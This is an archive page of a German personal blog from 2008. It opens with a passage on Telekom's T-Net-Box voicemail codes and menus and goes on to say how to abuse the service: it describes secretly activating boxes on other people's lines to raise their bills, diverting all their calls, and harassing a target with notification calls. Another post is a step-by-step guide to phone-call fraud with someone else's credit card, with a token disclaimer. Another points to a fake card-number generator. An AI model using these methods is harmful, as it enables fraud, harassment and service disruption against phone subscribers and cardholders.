“*555#” fuer “Anrufe im Besetztfall zur Box”
“*888#” fuer “Anrufe nach drei Klingelzeichen zur Box”

zum deaktivieren entsprechend: “#000#”, “#555#” und “#888#”.
Bei ISDN-Anschluessen muss zur Aktivierung der Box die AWS
(Anrufweiterschaltung) auf die Nummer 0130-144770 eingeschaltet werden,
teilweise muss erst ein Komfortanschluss beantragt werden, damit die AWS
verfuegbar ist.

Hier nochmal die wichtigsten Infos im Überblick:

- Freischalten der Box von jedem digitalen Telefonanschluss durch Anwahl von
0130-144770
- Aktivieren der Box durch “*888#” fuer “Umleitung auf Box bei Nichtmelden”,
“*555#” fuer “Umleitung auf Box bei besetzt” oder “*000#” fuer “Umleitung
aller Anrufe auf die Box”.
- Fernabfragen der Box durch Anwahl der eigenen Rufnummer, Drücken von “*”
und Eingabe der PIN (nun landet man im Hauptmenue und kann sich bequem von der Stimme fuehren lassen)
- Hilfe und Informationen zur T-Box sind, vorerst fuer Telekommitarbeiter,
unter der Rufnummer 0130-141414 vom unfreundlichen Operator erfragbar (Ihr
solltet, wenn gezielt gefragt wird, nicht leugnen, dass Ihr bei der Telekom
arbeitet)

Die Menüstruktur
—————–

Anwahl von 0130144770 oder der eigenem Rufnummer
\ /
\/
Eingabe der Pin
\ /
\/
Hauptmenue
/ \
/ \
Einagabe von “1″ zum Hoeren Eingabe von “3″ zum Aendern
der Nachrichten der Einstellungen
/ \
/ \
Waehrend des Abhoerens: – 1. Ansagetexte
1. Zurueckspulen 1.1 Namen aendern
2. Pause/Weiter 1.3 Begruessungstxt
3. Vorspulen/Uebersprigen 1.4 Ansagetext
7. Wiederholen – 2. Grundeinstellungen
8. Speichern 2.1 Betriebsart
9. Loeschen waehlen: AB oder
0. Zurueck nur Ansagetext
2.6 Statusabfrage
2.9 Loeschen der Box
- 3. Benachrichtigungen
3.1 Benachrichtigung
am eigenen Phone
3.2 Infofix (gibts
noch ganich)
3.3 Auf Pagern
3.4 Auf Beliebigen
Anschluessen
- 4. Aendern der PIN
- 5. Hilfetext
- #5 Operatorruf (free!)
- 0 Ins Hauptmenue

Technische Informationen:

- In der Grundstufe fasst die Box 30 Nachrichten zu je 2 Minuten
- In der spaeter folgenden (gegen Jahresende) Aufbaustufe wird die Box gegen
Aufpreis eine hoehere Aufzeichnungskapazitaet und z.B. Funktionen wie
Faxempfang unterstuetzen
- Z.Zt befindet sich der ganze T-Net-Box-Rechner in Duesseldorf, zum
offiziellen Marktstart soll aber die notwendige Hardware jeweils in der
eigenen Vermittlungsstelle vorhanden sein

T-Box zum Missbrauchen

Nun das wichtigste: Wie kann ich mit meiner T-Box der Deutschen Telekom
schaden?
Ja, jetzt haben wir hoffentlich verstanden, wie einfach und schnell man die
eigene T-Box selber freischalten kann, das muss man der Telekom wirklich
lassen, das isst ja ein ganz unkomplizierter Vorgang. Naja, aber wäre doch mal
interessant zu erfahren, was passiert, wenn man auf FREMDEN Anschluessen
T-Boxen freischaltet… Muessen die Anschlussinhaber dann nicht 4 € im Monat
zahlen? Oder noch besser: Was ist, wenn die Anschlüsse der Telekom gehören,
da sie sich in TELEFONZELLEN befinden? Ja, sehr interessant…
In der Tat sieht es so aus: Digital vermittelte Telefonzellen bieten (zur Zeit)
prinzipiell die Möglichkeit, T-Boxen auf sich selber freizuschalten.
Theoretisch müssten dann auch die 4 € pro Monat auf deren Kosten “abgebucht”
werden, was natuerlich nicht möglich ist. Im Moment werden jedoch
sowieso noch keine Gebühren fuer die Box erhoben, aber spätestens ab dem
offiziellen Marktstart wird wohl auch das der Fall werden. Im Zusammenhang mit
Telefonzellen oder fremden Anschluessen bietet die T-Box grundsätzlich fünf
(Ab-)Nutzungsmoeglichkeiten:

1.) Nach der Freischaltung einer T-Net-Box wird zunaechst default-maessig eine
Standardansage benutzt, die die RUFNUMMER des ANSCHLUSSES beinhaltet.
Prinzipiell ist das die EINZIGE Moeglichkeit fuer den normal-T-Net-Benutzer,
die Rufnummer eines Anschlusses herauszubekommen, die keine (ISDN)-Kennung
uebertraegt. Also koennt Ihr in Zukunft auch in Telefonzellen (oder im
Hotelzimmer) zurueckgerufen werden, selbst wenn dort die Rufnummer des
Anschlusses NICHT bekanntgegeben wird, oder findet sie einfach selber heraus!

2.) Die bloedste Nutzungsmoeglichkeit: Wenn ihr bei einem “Freund” oder
Bekannten zu Besuch seid, koennt ihr durch wenige Handgriffe seine
Telefonrechnung um DM 4 im Monat ansteigen lassen, oder seinen Anschluss sogar
ganz von der Aussenwelt abkapseln: Aktiviert bei jemandem die T-Net-Box, und
schalten “*000#” ein, somit werden alle Anrufer auf seine Box umgeleitet,
wovon das Opfer ja nicht weiss. (Bei der Aktivierung der “*000#”-Funktion ist
fuer den Anschlussinhaber nur ein Sonderwahlton zu hoeren, er merkt also, dass
irgendetwas mit seiner Line nicht in Ordning ist…

3.) Eine andere Methode, die Box zu missbrauchen, ist, einfach in der
Benachrichtigungsfunktion die Nummer eines geliebten Todfeindes einzusetzen,
und sobald wir in der Box durch Anwahl der 0130-144770 eine Nachricht, oder
auch zwei oder auch 2 Millionen hinterlassen, klingelt bei ihm das Telefon
sturm (Und zwar wird die Zielperson dann direkt von der Deutschen Telekom
terrorisiert, hehe). Oder man gibt in der Benachrichtigungsfunktion einfach die
Nummer eines beliebten Boards an, und kann so, vollkommen kostenfrei, fuer
staendige Nichterreichbarkeit sorgen, das bringt Freude! (und Feinde…)

Geposted in Lesenswertes

Anonyme Daten generieren

Mrz25
2008 Kommentieren Geschrieben von Daniel

Um Anonyme Daten generieren zu lassen u.a. auch VISA-Kreditkartennummern, Bankverbindungen …

Dem sei mit dem Fakerscript auf http://fakerscript.6x.to zu helfen.

Ziemlich brauchbar. Aber es darf natürlich !!! nicht misbraucht !!! werden

Geposted in Lesenswertes

Kostenlose Kreditkartengespräche

Mrz25
2008 Kommentieren Geschrieben von Daniel

Seid einiger Zeit bieten Telefongesellschaften die Möglichkeit an Telefonate direkt über die eigene Kreditkarte abbuchen zu lassen, wodurch Telefonkarten und Münzen mehr oder weniger überflüssig werden. Ich unterscheide in diesem Text zwischen den USA und Deutschland, da die USA uns, wie fast immer, einen Schritt vorraus sind. Kreditkartengespräche können von jedem Telefon aus geführt werden, aber ich beschränke mich in diesem Text auf öffentliche Telefone, da diese für unsere Zwecke schlichtweg besser sind, und sich diese Methode auf andere Telefone übertragen lässt. Was ihr für unser Vorhaben benötigt ist ein Telefon, und eine Kreditkarte mit gültigem Ablaufdatum, die möglichst nicht auf euren Namen läuft. Ich werde euch nicht helfen eine solche Karte zu finden, also spart euch die Mails.

Dieser Text stellt in keiner Weise einen Aufruf zum Kreditkarten-betrug dar, er soll lediglich auf Schwachstellen in der Authentifizierung der Karteninhaber hinweisen. Besonders erschreckend war es festzustellen, dass die ganz grossen Amerikanischen Telefongesellschaften davon betroffen sind. Der Author ist in _keinster_ Weise für die Handlungen von Drittpersonen schuldig, und besteht darauf, dass die hier aufgezeigten Schwachstellen von _niemandem_ ausgenutzt werden! Falls dies doch geschehen sollte, so kann der Author unter keinen Umständen dafür haftbar gemacht werden!!!!!!
USA

Als erstes solltet ihr euch ein Münztelefon an einem ruhigen Örtchen suchen und ausfindig machen welcher Anbieter sich hinter diesem Telefon verbirgt. Der Anbieter hat in der Regel ein Logo oder ähnliches auf dem Telefon oder an der Telefonzelle. Ich konnte leider nur einen Anbieter testen, das ich in den Ferien auch noch anderes vorhatte, und der ganze staat nunmal mit der Telefongesellschaft zugepflastert war. Getestet hab ich den Anbieter Verizon. Was ihr als erstes zu tun habt ist heraus zu finden wie ihr euch mit einem Operator verbinden lasst, in der Regel geht das einfach durch das drücken der “0″. Eine Computerstimme listet euch dann die Menüpunkte auf, und als letzter Punkt sollte er etwas in der Art “..and if you want to talk to an Operator press or say “Operator” after the signal..” sagen. Und genau diesen Menupunkt wählt ihr aus. Ihr werdet dann direkt mit einem “echten” Operator verbunden der euch mit Rat und Tat zur Seite steht. Erzählt ihm, dass ihr ein Kreditkartengespräch nach führen wollt, und er fragt euch nach der Nummer. Gebt ihm die Nummer mit Landesvorwahl, und ihr werdet nach dem Kreditkartentyp gefragt (Das kommt allerdings wieder auf die Telefongesellschaft an, und komischer Weise auch auf den Operator) und anschliessend nach der Nummer und dem Ablaufdatum der Karte. Allerdings NICHT nach dem Namen, was unser Vorhaben erheblich erleichtert. Gebt ihm Nummer und Datum und ihr werdet mit der gewünschten Nummer verbunden. FERTIG! Ihr werdet euch allerdings nur selten darum drücken können mit “echten” Operator verbunden zu werden, und um das ganze einigermassen authentisch wirken zu lassen solltet ihr über ordentliche Englischkenntnisse verfügen.

Deutschland

Da Deutschland in Punkto Kundenfreundlichkeit mit den USA nicht mithalten kann ist das ganze ein klein wenig komplizierter. Ihr könnt nicht einfach eine “0″ wählen und werdet mit einem Operator verbunden sondern ihr müsst einen Drittanbieter anrufen der Kreditkarten Gespräche anbietet (Die Telekom macht das, meines Wissens nach derzeitig nicht). Ich weiche in diesem Fall wieder in die USA aus, da diese Anbieter auch aus Deutschland via 0800er erreicht werden können, da sie ihren Kunden ihre Services natürlich auch aus dem Ausland anbieten möchte. Alles was ihr machen müsst ist die Auslandsnummer von Verizon, AT&T oder ähnlichem zu wählen und die gleiche Kiste abziehen wie oben beschrieben. Benutzt entwerder die unten stehende Nummer um mit AT&T euer Glück zu versuchen, oder Sucht mit einem Wardialer nach entsprechende Diensten, es gibt einige davon. Wenn ihr einen guten Anbieter für CC Gepräche findet wäre ich um eine kurze mail sehr erfreut. Ich habe leider bis heute keinen Weg gefunden mich von Deutschland aus mit Verizon verbinden zu lassen.

0800-Nummern zu CC-Call Anbietern

0800-2255288 <- AT&T – gewöhnungsbedürftiges Menu

0800-8888000 <- Worldphone

Geposted in Allgemein

Welche Zahl folgt als nächstes…?

Mrz24
2008 Kommentieren Geschrieben von Daniel

64, 16, 4, 1, 1/4 …

natürlich 1/16

Geposted in Allgemein

Widerspruch gegen Schulverweis

Mrz24
2008 Kommentieren Geschrieben von Daniel

Schreiben an Lehrer wegen Verweis

Sehr geehrter Herr/Frau …,

hiermit muss ich einen deutlichen Widerspruch gegen den an meinen Sohn … gerichteten Verweis formulieren. Ich halte diesen für völlig ungerechtfertigt und sehr zweifelhaft.

Die von Ihnen aufgeführten Gründe mögen zwar der Wahrheit entsprechen, aber ob diese ausreichen, um einen Verweis auszusprechen, wage ich zu bezweifeln. Außerdem erzählt mir mein Sohn immer wieder, dass Sie ihn bei jeder Gelegenheit schlecht behandeln und vor der Klasse bloßstellen.

Sollten Sie diesen Verweis nicht zurücknehmen, sehe ich mich dazu veranlasst, diesen Fall der Schulbehörde vorzutragen und entsprechende Schritte gegen Sie einzuleiten.

Mit freundlichen Grüßen,

Geposted in Vorlagen

Outlook2003: Das Element kann nicht gefunden werden

Mrz24
2008 Kommentieren Geschrieben von Daniel

Problem: Man klickt auf einer Webseite ein eMail Link an (mailto:) und es wird nicht Outlook geöffnet um eine eMail an diese Adresse zu schreiben sondern es kommt ein PopUp mit der Fehlermeldung “Das Element kann nicht gefunden werden”.

Lösung:

1. Outlook schliessen.

2. Die “FRMCHACHE.DAT” im Ordner “C:\Dokumente und Einstellungen\%user%\Lokale Einstellungen\Anwendungsdaten\Microsoft\FORMS\“

Geposted in Bugs, Win Stuff

Failed to set the policy mode. Error – Access is denied. Exiting…

Mrz20
2008 1 Kommentar Geschrieben von Daniel

Sollten unter Windows Netzwerklaufwerke fehlen, führt man ja den command gpupdate /sync oder /force aus.

Es kann sein das die Fehlermeldung “Failid to set the policy mode. Error – Access is denied. Exiting…” kommt. D.h. das, dass Computerkonto kaputt ist. (Siehe Screenshot)

Lösung: Rechner aus der domain nehmen, Computerkonto löschen, Rechner in die Domäne hängen und in den richtigen ADS Container verschieben.

Geposted in Bugs, Win Stuff

Allgemein (39)
Börse (6)
Coding (7)
- C (1)
- PHP (4)
eBooks (3)
Forex Stuff (2)
Games (3)
General (3)
Handy Stuff (4)
Hardware (2)
Informatives (5)
iPhone (1)
Lesenswertes (12)
Linux Stuff (20)
- Plesk (7)
Mac Stuff (14)
- Bugs (1)
- Tipps&Tricks (6)
News (1)
SAP (1)
Security Informations (14)
SEO (2)
SEO @en (1)
Stock market (1)
- Forex (1)
Testberichte (1)
Vorlagen (9)
Web Stuff (3)
Win Stuff (56)
- Bugs (21)
- Downloads (4)
- Tipps&Tricks (28)
XXX (1)

Monatliches Archiv für: März, 2008

Letzte Kommentare

Kategorien

RSS

Tags